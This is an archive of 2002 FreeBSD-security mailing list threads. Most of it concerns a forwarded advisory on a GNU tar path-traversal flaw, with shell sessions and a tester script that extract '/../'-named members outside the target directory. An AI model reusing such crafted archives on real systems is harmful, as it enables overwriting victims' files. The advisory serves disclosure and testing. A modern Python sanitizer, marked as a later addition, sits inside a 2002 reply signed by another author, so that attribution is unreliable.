From owner-freebsd-security Mon Sep 30 7:30:47 2002
Date: Mon, 30 Sep 2002 15:26:34 +0100
From: Bruce M Simpson
To: Garrett Wollman
Cc: Ivailo Tanusheff, FreeBSD Security
Subject: Re: PKI
Message-ID: <20020930142634.GR26352@spc.org>
In-Reply-To: <200209271728.g8RHSGYT011814@khavrinen.lcs.mit.edu>

On Fri, Sep 27, 2002 at 01:28:16PM -0400, Garrett Wollman wrote:
> > www.openca.org
> ...or you can just write your own; I did one in about three weeks,
> most of which was spent figuring out why various pieces of software
> didn't do the obvious and standard thing.

Planning on releasing it? :-)

OpenCA seemed like a nice idea, but fixing people's broken makefiles
tends to erode one's enthusiasm!
BMS

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Mon Sep 30 8:21:27 2002
Date: Mon, 30 Sep 2002 18:19:53 +0300
From: Alexandr Kovalenko
To: Duncan Campbell
Cc: freebsd-security@FreeBSD.ORG, mailman@crypton.pl
Subject: Re: kern.ps_showallprocs and procfs
Message-ID: <20020930151953.GA44971@nevermind.kiev.ua>
In-Reply-To: <200209271254.GAA18796@tagish.taiga.ca>

Hello, Duncan Campbell!

On Fri, Sep 27, 2002 at 06:54:08AM -0600, you wrote:
> I tend to regard procfs as something of a debugging tool. If
> you limit it as is probably necessary to do what you suggest,
> its value as a tool becomes degraded.

No, I don't think that procfs is a debugging tool. It is used by
OpenOffice, for example.
--
NEVE-RIPE
Ukrainian FreeBSD User Group
http://uafug.org.ua/

From owner-freebsd-security Tue Oct 1 00:04:17 2002
Date: Tue, 1 Oct 2002 09:01:17 +0200
From: "Peter J. Blok"
To: "Crist J. Clark"
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: cisco/altiga client
Message-Id: <200210010901.17423.Peter.Blok@inter.NL.net>
In-Reply-To: <20021001060823.GD79303@blossom.cjclark.org>

Yeah I figured it was something like that. I have been watching the setup
of a client with a concentrator and I see the same. I was hoping the
client was able to run in a sort of compatibility mode, but haven't found
it so far. My last attempt will be to try it with the version 3.6 client.

Peter

On Tuesday 01 October 2002 08:08, Crist J. Clark wrote:
> On Wed, Sep 25, 2002 at 01:57:35PM +0200, Peter J. Blok wrote:
> > Hi,
> >
> > I have Cisco VPN 3000 (Altiga) software client on my laptop.
> > With this client I establish a connection with a 3000 series
> > concentrator.
> >
> > I would like to use the same software client to establish a transport
> > connection with a FreeBSD host running racoon.
> >
> > Can somebody help me with this? Could this work?
>
> I've looked at it briefly. The system does some proprietary steps in
> authentication. You can't just log in like a "client" user. You could
> definitely set up a site-to-site VPN.

From owner-freebsd-security Tue Oct 1 9:47:54 2002
Date: Tue, 01 Oct 2002 10:47:23 -0600
From: Brett Glass
To: security@FreeBSD.ORG
Subject: Is FreeBSD's tar susceptible to this?
Message-Id: <4.3.2.7.2.20021001104558.00d3f900@localhost>
From Bugtraq:

Date: Fri, 27 Sep 2002 02:11:07 +0200 (CEST)
From: Bencsath Boldizsar
To: bugtraq@securityfocus.com
Subject: Allot Netenforcer problems, GNU TAR flaw

Security Advisory, case study - Netenforcer

1. Multiple security flaws lead to Netenforcer privilege escalation
2. Vulnerable tar packages

[Netenforcer material snipped]

2. Description of the "tar" problem

Creating a tar file with the -P option, one can put any file names in the
tar file. While unpacking such tar files, tar is designed to remove the
leading slash. Another security feature of the tar package is to deny
deployment of any files whose name contains "dotdot" ("..").

A bug in the tar package leads to a security flaw:

  "../something"    is denied by tar
  "/something"      leading slash is removed
  "/../something"   leading slash removed but ".." is NOT denied
  "./../something"  ".." is NOT denied.
Although we found this bug by studying tar, we found that this bug has
been found by others; we should give them credit. Check out:

  From: Mark J Cox (mjc@redhat.com)
  Subject: [SECURITY] bug in contains_dot_dot routine
  Newsgroups: gnu.utils.bug
  Date: 2002-05-27 03:45:07 PST
  by Mark J Cox / Red Hat / OpenSSL / Apache Software Foundation

and http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-1267

While this bug can affect systems with antivirus products (amavis is not
affected) or any systems like those mentioned before, we think that a
"more rapid" answer to such "small" security problems is needed. As you
have seen: small bugs can lead to a whole system crack.

Tar - Affected software versions:

GNU tar is affected, but e.g. SunOS tar does not do any sanity check.

  Debian:      tar 1.13.17-2             NOT vulnerable (-)
               tar 1.13.25-3 (unstable)  IS vulnerable (+)
               tar 1.13.25-2 (unstable)  IS vulnerable (+)
  Suse 7.3:    tar 1.13.18               NOT vulnerable
  Suse 6.4:    tar 1.13.17               NOT vulnerable
  Netenforcer: tar (in software 4.2)     IS vulnerable
  others:      unknown

Sample session:

  echo "foo bar" >/tmp/zz/b
  echo "foo bar" >/tmp/zz/b2
  echo "foo bar" >/tmp/zz/b3
  echo "foo bar" >a
  boldi@boldi:/tmp/b$ tar cfv b.tar a ../../../../../../../tmp/zz/b -P
  a
  ../../../../../../../tmp/zz/b
  boldi@boldi:/tmp/b$ rm /tmp/zz/b
  boldi@boldi:/tmp/b$ tar xfv b.tar
  a
  ../../../../../../../tmp/zz/b
  tar: ../../../../../../../tmp/zz/b: Member name contains `..'
  tar: Error exit delayed from previous errors
  boldi@boldi:/tmp/b$ ls -la /tmp/zz/b
  ls: /tmp/zz/b: No such file or directory
  #note - this is O.K., if found ".."
  in the name

  #session 2:
  boldi@boldi:/tmp/b$ tar cfv b2.tar a /tmp/zz/b2 -P
  a
  /tmp/zz/b2
  boldi@boldi:/tmp/b$ rm /tmp/zz/b2
  boldi@boldi:/tmp/b$ tar xfv b2.tar
  a
  /tmp/zz/b2
  tar: Removing leading `/' from member names
  boldi@boldi:/tmp/b$ ls -la /tmp/zz/b2
  ls: /tmp/zz/b2: No such file or directory
  boldi@boldi:/tmp/b$ ls -la /tmp/b/tmp/zz/b2
  -rw-rw-r--    1 boldi    boldi    10 sze  8 12:47 /tmp/b/tmp/zz/b2
  boldi@boldi:/tmp/b$ tar cfv b3.tar a /////tmp/zz/b3 -P
  a
  /////tmp/zz/b3
  boldi@boldi:/tmp/b$ rm /tmp/zz/b3
  boldi@boldi:/tmp/b$ tar xfv b3.tar
  a
  /////tmp/zz/b3
  tar: Removing leading `/////' from member names
  boldi@boldi:/tmp/b$ ls -la /tmp/zz/b3
  ls: /tmp/zz/b3: No such file or directory
  #session 2 is o.k.

  #session 3:
  boldi@boldi:/tmp/b$ echo "try this one. boldi." >/tmp/zz/final
  boldi@boldi:/tmp/b$ tar cfv bolditry.tar a /../../../../../../tmp/zz/final -P
  a
  /../../../../../../tmp/zz/final
  boldi@boldi:/tmp/b$ rm /tmp/zz/final
  boldi@boldi:/tmp/b$ ls -la /tmp/zz/final
  ls: /tmp/zz/final: No such file or directory
  boldi@boldi:/tmp/b$ tar xfv bolditry.tar
  a
  /../../../../../../tmp/zz/final
  tar: Removing leading `/' from member names
  boldi@boldi:/tmp/b$ ls -la /tmp/zz/final
  -rw-rw-r--    1 boldi    boldi    21 sze  8 13:03 /tmp/zz/final
  #session 3: vulnerable.

####Attachment: small script testing Your tar too#######

  #!/bin/sh
  # tar problem tester by boldi
  # Creates an archive whose member name starts with "/../.." (stored
  # verbatim with -P), deletes the original file, extracts the archive
  # from a different directory, and checks whether the file reappeared
  # at its original absolute location.
  TAR=/usr/bin/tar
  DIR=/tmp

  cd $DIR
  mkdir foo
  cd foo
  echo "boldi" >bar
  cd $DIR
  mkdir tartest
  cd tartest
  $TAR cfv boldi.tar /../../../../../../../$DIR/foo/bar -P
  rm $DIR/foo/bar
  if [ -f $DIR/foo/bar ] ; then
      echo "something went wrong with the test";
  else
      $TAR xfv boldi.tar 2>&1
      # A correct tar refuses the ".." member; a vulnerable one recreates
      # $DIR/foo/bar outside the extraction directory.
      if [ -f $DIR/foo/bar ] ; then
          echo "Your tar is vulnerable";
      else
          echo "Your tar is NOT vulnerable or error occurred";
      fi;
  fi
  # clean up
  cd $DIR
  rm foo/bar
  rmdir foo
  rm tartest/boldi.tar
  rmdir tartest

##############end of attachment##########################

Boldizsar Bencsath
Dept. of Telecommunications
Budapest University of Technology and Economics
H-1111 Budapest, Magyar tudósok körútja 2.
I ép. E.429.
email: bencsath.boldizsar@mail2002.ebizlab.hit.bme.hu

From owner-freebsd-security Tue Oct 1 10:27:30 2002
Date: Tue, 1 Oct 2002 10:27:24 -0700
From: "Crist J. Clark"
To: "Peter J.
Blok"
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: cisco/altiga client
Message-ID: <20021001172724.GA81932@blossom.cjclark.org>
Reply-To: cjclark@alum.mit.edu
In-Reply-To: <200210010901.17423.Peter.Blok@inter.NL.net>
X-URL: http://people.freebsd.org/~cjc/

On Tue, Oct 01, 2002 at 09:01:17AM +0200, Peter J. Blok wrote:
> Yeah I figured it was something like that. I have been watching the setup of a
> client with a concentrator and I see the same.

Duh, I completely misread your mail. You want to use the Cisco _client_
software to connect to racoon. I really doubt this will work. Are you
running Win2k or another Windows version with native IPsec? You'd be much
better off trying that.
--
Crist J. Clark                     |     cjclark@alum.mit.edu   |   cjclark@jhu.edu
http://people.freebsd.org/~cjc/    |     cjc@freebsd.org

From owner-freebsd-security Tue Oct 1 10:35:32 2002
X-message-flag: Warning!
Use of Microsoft Outlook is dangerous and makes your system susceptible to Internet worms.
Date: Tue, 01 Oct 2002 11:35:03 -0600
From: Brett Glass
To: "Aaron Namba"
Subject: RE: Is FreeBSD's tar susceptible to this?
Message-Id: <4.3.2.7.2.20021001113225.034331b0@localhost>
References: <4.3.2.7.2.20021001104558.00d3f900@localhost>

At 11:15 AM 10/1/2002, Aaron Namba wrote:
>It would appear so.
>
>59 > sh tartest
>/../../../../../../..//tmp/foo/bar
>/../../../../../../..//tmp/foo/bar
>/usr/bin/tar: Removing leading `/' from member names
>Your tar is vulnerable

Unfortunately, GNU tar has become so pervasive that even OpenBSD (which
avoids GNU software) uses it. Gotta break this dependency upon GPLed code.
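The four cases in the forwarded advisory, and the "Your tar is vulnerable" result quoted above, come down to one rule: the ".." check has to be applied to every path component after the leading slashes have been stripped, not to the raw member name. The following is an added example written for this archive; it is not code from GNU tar, from the advisory, or from any poster on the thread. The function names, the classify() helper and the /srv/extract destination used in its docstrings are assumptions; the member names it is fed are the advisory's own, embedded as constructed input.

```python
"""Component-wise member-name check for an archive extractor.

Added example for this thread, not GNU tar's code. It models the two steps
the advisory describes (strip leading slashes, then refuse "..") in the
order and at the granularity that closes the "/../x" and "./../x" cases.
"""
import os
import posixpath


class UnsafeMemberName(ValueError):
    """Raised for a member name that would be written outside the extraction dir."""


def strip_leading_slashes(name: str) -> str:
    # The "Removing leading `/' from member names" step: an absolute name
    # becomes relative to the extraction directory, e.g.
    # "/////tmp/zz/b3" -> "tmp/zz/b3".
    return name.lstrip("/")


def contains_dot_dot(name: str) -> bool:
    # Inspect every component, not just the start of the string: after slash
    # stripping "/../x" is "../x", and "./../x" hides the ".." behind a ".".
    return any(component == ".." for component in name.split("/"))


def safe_member_name(name: str) -> str:
    """Return the relative path a member may be extracted to, or raise."""
    relative = strip_leading_slashes(name)
    if relative == "":
        raise UnsafeMemberName(f"empty member name {name!r}")
    if contains_dot_dot(relative):
        raise UnsafeMemberName(f"member name {name!r} contains '..'")
    # Collapse "." components and repeated slashes. No ".." can survive this
    # because every ".." component was rejected above.
    return posixpath.normpath(relative)


def extraction_target(dest_dir: str, name: str) -> str:
    """Absolute path the member lands on, verified to stay under dest_dir.

    The realpath/commonpath comparison is a second line of defence: it also
    catches a symlink already present under dest_dir that points outside it.
    """
    dest = os.path.realpath(dest_dir)
    target = os.path.realpath(os.path.join(dest, safe_member_name(name)))
    if os.path.commonpath([dest, target]) != dest:
        raise UnsafeMemberName(f"member name {name!r} resolves outside {dest}")
    return target


def classify(names):
    """Map each member name to its sanitised form, or to 'denied'."""
    result = {}
    for name in names:
        try:
            result[name] = safe_member_name(name)
        except UnsafeMemberName:
            result[name] = "denied"
    return result


# The advisory's four cases plus the member names from its sample sessions.
# Constructed input: nothing here is read from a real archive.
ADVISORY_CASES = [
    "../something",
    "/something",
    "/../something",
    "./../something",
    "/tmp/zz/b2",
    "/////tmp/zz/b3",
    "/../../../../../../tmp/zz/final",
]

if __name__ == "__main__":
    for name, outcome in classify(ADVISORY_CASES).items():
        print(f"{name:36} -> {outcome}")
```

Run as a script it prints each name with "denied" or its sanitised form; session 2's "/tmp/zz/b2" becomes "tmp/zz/b2" under the extraction directory exactly as the advisory shows, while both session 3's "/../../../../../../tmp/zz/final" and the test script's "/../../../../../../..//tmp/foo/bar" are refused. The same component-wise check is what a defender should expect from anything that unpacks untrusted archives, including the virus-scanning front ends the advisory mentions.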
--Brett

From owner-freebsd-security Tue Oct 1 10:46:29 2002
Date: Tue, 1 Oct 2002 13:46:24 -0400 (EDT)
From: Matt Piechota
To: Brett Glass
Cc: Aaron Namba
Subject: RE: Is FreeBSD's tar susceptible to this?
Message-ID: <20021001134440.V15368-100000@cithaeron.argolis.org>
In-Reply-To: <4.3.2.7.2.20021001113225.034331b0@localhost>

On Tue, 1 Oct 2002, Brett Glass wrote:
> Unfortunately, GNU tar has become so pervasive
> that even OpenBSD (which avoids GNU software) uses
> it. Gotta break this dependency upon GPLed code.

Fearing the off-topic avalanche that's going to come of this...

Why the GPL? It would have been just as likely to happen in BSD tar,
except you'd have lots of people with their own patches that no one else
could see.
While the GPL isn't

--
Matt Piechota

From owner-freebsd-security Tue Oct 1 11:24:08 2002
Date: Tue, 01 Oct 2002 12:23:30 -0600
From: Brett Glass
To: Matt Piechota
Cc: Aaron Namba
Subject: RE: Is FreeBSD's tar susceptible to this?
Message-Id: <4.3.2.7.2.20021001122135.0344e410@localhost>
In-Reply-To: <20021001134440.V15368-100000@cithaeron.argolis.org>

At 11:46 AM 10/1/2002, Matt Piechota wrote:
>Fearing the off-topic avalanche that's going to come of this...
>
>Why the GPL? It would have been just as likely to happen in BSD tar,

It would be less likely, because the BSDs have more peer review and
more careful auditing.

>except you'd have lots of people with their own patches that no one else
>could see.

Define "lots of people." When either FreeBSD, NetBSD, OpenBSD, or Darwin
is patched, the others will follow.
--Brett

From owner-freebsd-security Tue Oct 1 11:52:35 2002
Date: Tue, 1 Oct 2002 13:52:28 -0500
From: "Thomas T. Veldhouse"
To: "Matt Piechota", "Brett Glass"
Cc: "Aaron Namba"
Subject: [OT] Re: Is FreeBSD's tar susceptible to this?
Message-ID: <031201c2697b$b1de6070$8204dca7@northamerica.corp.microsoft.com>

That has absolutely nothing to do with the license of any software
product. That was very much picking on GPL for more selfish reasons than
this tar security notice. ;)

Tom Veldhouse

----- Original Message -----
From: "Brett Glass"
To: "Matt Piechota"
Cc: "Aaron Namba"
Sent: Tuesday, October 01, 2002 1:23 PM
Subject: RE: Is FreeBSD's tar susceptible to this?

> At 11:46 AM 10/1/2002, Matt Piechota wrote:
>
> >Fearing the off-topic avalanche that's going to come of this...
> >
> >Why the GPL?
> >It would have been just as likely to happen in BSD tar,
>
> It would be less likely, because the BSDs have more peer review and
> more careful auditing.
>
> >except you'd have lots of people with their own patches that no one else
> >could see.
>
> Define "lots of people." When either FreeBSD, NetBSD, OpenBSD, or Darwin
> is patched, the others will follow.
>
> --Brett

From owner-freebsd-security Tue Oct 1 12:22:14 2002
Date: Tue, 01 Oct 2002 15:22:10 -0400
From: Larry Sica
Subject: Re: Is FreeBSD's tar susceptible to this?
In-reply-to: <4.3.2.7.2.20021001122135.0344e410@localhost>
To: Brett Glass
Cc: Matt Piechota, Aaron Namba, security@FreeBSD.ORG
Message-id: <150AE1C1-D573-11D6-AD20-000393A335A2@earthlink.net>

On Tuesday, October 1, 2002, at 02:23 PM, Brett Glass wrote:
> At 11:46 AM 10/1/2002, Matt Piechota wrote:
>
>> Fearing the off-topic avalanche that's going to come of this...
>>
>> Why the GPL? It would have been just as likely to happen in BSD tar,
>
> It would be less likely, because the BSDs have more peer review and
> more careful auditing.
>

This is not because of the BSDL or GPL though. It is because of the
project's makeup. Politics aside, a license has nothing to do with the
quality of the work, or lack thereof. And many *BSD and BSDL products
have had security problems. Now sure, the zlib problem was avoided.
But FreeBSD has had its own recent spate of problems. I am not sure
this discussion is even appropriate in this forum. If we are
vulnerable it needs to be fixed, period. Let's not use a security
problem for political maneuvering.
--Larry

From owner-freebsd-security Tue Oct 1 12:35:55 2002
Date: Tue, 01 Oct 2002 13:35:27 -0600
From: Brett Glass
To: Matthew Dillon
Cc: Matt Piechota, Aaron Namba
Subject: Re: RE: Is FreeBSD's tar susceptible to this?
Message-Id: <4.3.2.7.2.20021001133156.03609ec0@localhost>
In-Reply-To: <200210011928.g91JSOdI045047@apollo.backplane.com>

At 01:28 PM 10/1/2002, Matthew Dillon wrote:
> In our case, we have a simple recourse for 'tar' if the gnu/tar
> people are unable to stabilize their final product. We find a fairly
> stable version and we fork it in our tree.

I agree. And while folks are correct that licensing is not the only issue
here, why not take the opportunity to adopt something BSD-licensed instead?
At the same time, it would be possible to integrate bzip instead of invoking
it as a separate process. This would make it more efficient when we go to
bzip for ports and packages.

--Brett

From owner-freebsd-security Tue Oct 1 12:56:36 2002
Date: Tue, 1 Oct 2002 15:43:23 -0400 (EDT)
From: Matt Piechota
To: Cy Schubert - CITS Open Systems Group
Cc: Brett Glass, Aaron Namba
Subject: Re: Is FreeBSD's tar susceptible to this?
Message-ID: <20021001154227.E15368-100000@cithaeron.argolis.org>
In-Reply-To: <200210011803.g91I3glk004506@cwsys.cwsent.com>

On Tue, 1 Oct 2002, Cy Schubert - CITS Open Systems Group wrote:
> > Why the GPL?
> > It would have been just as likely to happen in BSD tar,
> > except you'd have lots of people with their own patches that no one else
> > could see. While the GPL isn't
>
> People, please take this GPL discussion to -chat. Thanks.

Sorry, I actually started to write, thought, "Why the hell would I send
this to -security?" and hit C-x instead of C-c by accident. Oops.

--
Matt Piechota

From owner-freebsd-security Tue Oct 1 13:14:33 2002
Date: Tue, 01 Oct 2002 16:13:49 -0400
From: Larry Sica
Subject: Re: Is FreeBSD's tar susceptible to this?
In-reply-to: <200210011934.g91JY6OW045102@apollo.backplane.com>
To: Matthew Dillon
Cc: Brett Glass, Matt Piechota, Aaron Namba, security@FreeBSD.ORG
Message-id: <4C74EABB-D57A-11D6-AD20-000393A335A2@earthlink.net>

On Tuesday, October 1, 2002, at 03:34 PM, Matthew Dillon wrote:
>
> :This is not because of the BSDL or GPL though. It is because of the
> :project's makeup. Politics aside, a license has nothing to do with the
> :quality of the work, or lack thereof. And many *BSD and BSDL products
> :have had security problems. Now sure, the zlib problem was avoided.
> :But FreeBSD has had its own recent spate of problems. I am not sure
> :this discussion is even appropriate in this forum. If we are
> :vulnerable it needs to be fixed, period. Let's not use a security
> :problem for political maneuvering.
> :
> :--Larry
>
> The zlib problem was not avoided, e.g. 1.5.8.1 of deflate.c (unless
> you are talking about another one, there were a couple of issues
> if I recall), but zlib is an excellent example of the success of the
> open-source community grapevine.

I would have to go back and check for the exact one, but I should have
been clearer: FreeBSD was affected but not as bad as some other OSes.
Mostly because FreeBSD Did The Right Thing. I'll be clearer what I mean
in the future.
--Larry

From owner-freebsd-security Tue Oct 1 13:20:07 2002
Delivered-To: freebsd-security@freebsd.org
Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 320F137B401 for ; Tue, 1 Oct 2002 13:20:06 -0700 (PDT)
Received: from lariat.org (lariat.org [63.229.157.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id 7C85943E42 for ; Tue, 1 Oct 2002 13:20:05 -0700 (PDT) (envelope-from brett@lariat.org)
Received: from mustang.lariat.org (IDENT:ppp1000.lariat.org@lariat.org [63.229.157.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id OAA21389; Tue, 1 Oct 2002 14:19:51 -0600 (MDT)
X-message-flag: Warning! Use of Microsoft Outlook is dangerous and makes your system susceptible to Internet worms.
Message-Id: <4.3.2.7.2.20021001141233.036c0b00@localhost>
X-Sender: brett@localhost
X-Mailer: QUALCOMM Windows Eudora Version 4.3.2
Date: Tue, 01 Oct 2002 14:19:49 -0600
To: Matthew Dillon
From: Brett Glass
Subject: Re: RE: Is FreeBSD's tar susceptible to this?
Cc: Matt Piechota, Aaron Namba,
In-Reply-To: <200210011947.g91Jl1sO052241@apollo.backplane.com>
References: <4.3.2.7.2.20021001113225.034331b0@localhost> <4.3.2.7.2.20021001122135.0344e410@localhost> <4.3.2.7.2.20021001133156.03609ec0@localhost>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

At 01:47 PM 10/1/2002, Matthew Dillon wrote:

> I seriously doubt anyone would be interested in rolling their own
> gnu-compatible tar or adapting an older non-gnu tar to our needs.
> People have gotten used to the gnu switches.

I seriously doubt anyone would be interested in creating or using an operating system based on BSD. People have gotten used to Linux.
:-S

Or s/Linux/Windows/ in the above. It's clearly important, from a *security* standpoint (and, yes, this is about security, not just licensing), that there not be a monoculture.

> I'm not sure I understand why you are advocating integrating bzip
> into tar.

Because IPC consumes resources and computing power. Going directly to zlib makes a lot more sense, IMHO.

--Brett

From owner-freebsd-security Tue Oct 1 14:04:14 2002
Delivered-To: freebsd-security@freebsd.org
Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 3A5C437B401 for ; Tue, 1 Oct 2002 14:04:13 -0700 (PDT)
Received: from pogo.caustic.org (caustic.org [64.163.147.186]) by mx1.FreeBSD.org (Postfix) with ESMTP id D811B43E77 for ; Tue, 1 Oct 2002 14:04:11 -0700 (PDT) (envelope-from jan@caustic.org)
Received: from localhost (jan@localhost) by pogo.caustic.org (8.11.6/8.11.6) with ESMTP id g91L3CV90978; Tue, 1 Oct 2002 14:03:12 -0700 (PDT) (envelope-from jan@caustic.org)
Date: Tue, 1 Oct 2002 14:03:11 -0700 (PDT)
From: "f.johan.beisser"
To: Brett Glass
Cc: Matthew Dillon, Matt Piechota, Aaron Namba,
Subject: Re: RE: Is FreeBSD's tar susceptible to this?
In-Reply-To: <4.3.2.7.2.20021001133156.03609ec0@localhost>
Message-ID: <20021001134719.S67581-100000@pogo.caustic.org>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

On Tue, 1 Oct 2002, Brett Glass wrote:

> I agree. And while folks are correct that licensing is not the only issue
> here, why not take the opportunity to adopt something BSD-licensed instead?
> At the same time, it would be possible to integrate bzip instead of invoking
> it as a separate process.
> This would make it more efficient when we go to
> bzip for ports and packages.

Brett, i'm going to thank you on behalf of the various BSD projects for volunteering your time and skills in creating a BSD-licensed tar that is GNU-tar compatible. should i expect this before or after the BSD-licensed C compiler?

-------/ f. johan beisser /--------------------------------------+
http://caustic.org/~jan jan@caustic.org
"John Ashcroft is really just the reanimated corpse of J. Edgar Hoover."
-- Tim Triche

From owner-freebsd-security Tue Oct 1 14:10:51 2002
Delivered-To: freebsd-security@freebsd.org
Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id C08A437B401 for ; Tue, 1 Oct 2002 14:10:49 -0700 (PDT)
Received: from lariat.org (lariat.org [63.229.157.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id D8D5243E86 for ; Tue, 1 Oct 2002 14:10:48 -0700 (PDT) (envelope-from brett@lariat.org)
Received: from mustang.lariat.org (IDENT:ppp1000.lariat.org@lariat.org [63.229.157.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id PAA22192; Tue, 1 Oct 2002 15:10:09 -0600 (MDT)
X-message-flag: Warning! Use of Microsoft Outlook is dangerous and makes your system susceptible to Internet worms.
Message-Id: <4.3.2.7.2.20021001150751.00d134d0@localhost>
X-Sender: brett@localhost
X-Mailer: QUALCOMM Windows Eudora Version 4.3.2
Date: Tue, 01 Oct 2002 15:10:06 -0600
To: "f.johan.beisser"
From: Brett Glass
Subject: Re: RE: Is FreeBSD's tar susceptible to this?
Cc: Matthew Dillon, Matt Piechota, Aaron Namba,
In-Reply-To: <20021001134719.S67581-100000@pogo.caustic.org>
References: <4.3.2.7.2.20021001133156.03609ec0@localhost>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

At 03:03 PM 10/1/2002, f.johan.beisser wrote:

>Brett, i'm going to thank you on behalf of the various BSD projects for
>volunteering your time and skills in creating a BSD licensed tar that is
>GNU-tar compatible.

It shouldn't be hard to do. Will anyone volunteer to be the other half of the clean room reverse engineering team so that we can avoid copyright problems and whip this out as soon as possible?

>should i expect this before or after the BSD licensed
>C compiler?

Actually, there already ARE BSD-licensed C compilers, including TenDRA. The BSDs should use one of them.

--Brett

From owner-freebsd-security Tue Oct 1 15:01:12 2002
Delivered-To: freebsd-security@freebsd.org
Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 3CFF137B401 for ; Tue, 1 Oct 2002 15:01:10 -0700 (PDT)
Received: from pogo.caustic.org (caustic.org [64.163.147.186]) by mx1.FreeBSD.org (Postfix) with ESMTP id EA3CE43E42 for ; Tue, 1 Oct 2002 15:01:09 -0700 (PDT) (envelope-from jan@caustic.org)
Received: from localhost (jan@localhost) by pogo.caustic.org (8.11.6/8.11.6) with ESMTP id g91M0Qo91607; Tue, 1 Oct 2002 15:00:26 -0700 (PDT) (envelope-from jan@caustic.org)
Date: Tue, 1 Oct 2002 15:00:25 -0700 (PDT)
From: "f.johan.beisser"
To: Brett Glass
Cc: Matthew Dillon, Matt Piechota, Aaron Namba,
Subject: Re: RE: Is FreeBSD's tar susceptible to this?
In-Reply-To: <4.3.2.7.2.20021001150751.00d134d0@localhost>
Message-ID: <20021001142208.S67581-100000@pogo.caustic.org>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

On Tue, 1 Oct 2002, Brett Glass wrote:

> It shouldn't be hard to do. Will anyone volunteer to be the other half
> of the clean room reverse engineering team so that we can avoid copyright
> problems and whip this out as soon as possible?

if the code is fresh, and written from scratch, there will be no copyright problems. it just has to be able to decipher the tarball, after all.

since tar's command line structure and switches predate GNU-tar, i don't think that will be an issue. i don't know many people who use the GNU style long switch convention when doing a fast tar script.

in looking at /usr/src/bin/pax/tar.[c,h], i don't see any evidence of the GPL in there. as far as i know, you have to choose to install GNU-tar, as a separate program; something which i do, to ensure compatibility across all my machines and platforms. if i'm wrong in this understanding, please correct me, and point me to the evidence that says otherwise.

> >should i expect this before or after the BSD licensed
> >C compiler?
>
> Actually, there already ARE BSD-licensed C compilers, including TenDRA.
> The BSDs should use one of them.

yes, but can any of those compile the OS as it's already written? i wouldn't want to be the poor victim assigned to rewrite all the lines of code. counting comments, and i assume, whitespace (meaning it's not 100% accurate):

[jan@hi src] {73}$ find /usr/src -name "*.[h,c]" -print | xargs wc -l \
    | grep -v total | awk ' { s = s + $1 } { print s } ' | tail -1
6217166

that's at least 5 million lines of code. as several have said before me: if it's not broken, don't fix it.

-------/ f. johan beisser /--------------------------------------+
http://caustic.org/~jan jan@caustic.org
"John Ashcroft is really just the reanimated corpse of J. Edgar Hoover."
-- Tim Triche

From owner-freebsd-security Tue Oct 1 15:01:38 2002
Delivered-To: freebsd-security@freebsd.org
Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 5889037B401 for ; Tue, 1 Oct 2002 15:01:37 -0700 (PDT)
Received: from pogo.caustic.org (caustic.org [64.163.147.186]) by mx1.FreeBSD.org (Postfix) with ESMTP id D179343E4A for ; Tue, 1 Oct 2002 15:01:36 -0700 (PDT) (envelope-from jan@caustic.org)
Received: from localhost (jan@localhost) by pogo.caustic.org (8.11.6/8.11.6) with ESMTP id g91M1aA91631 for ; Tue, 1 Oct 2002 15:01:36 -0700 (PDT) (envelope-from jan@caustic.org)
Date: Tue, 1 Oct 2002 15:01:36 -0700 (PDT)
From: "f.johan.beisser"
To: security@freebsd.org
Subject: Apologies..
Message-ID: <20021001150109.W67581-100000@pogo.caustic.org>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

i meant to move this thread to -chat, where it belongs.

-------/ f. johan beisser /--------------------------------------+
http://caustic.org/~jan jan@caustic.org
"John Ashcroft is really just the reanimated corpse of J. Edgar Hoover."
-- Tim Triche

From owner-freebsd-security Tue Oct 1 15:09:12 2002
Delivered-To: freebsd-security@freebsd.org
Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id E813737B404 for ; Tue, 1 Oct 2002 15:09:10 -0700 (PDT)
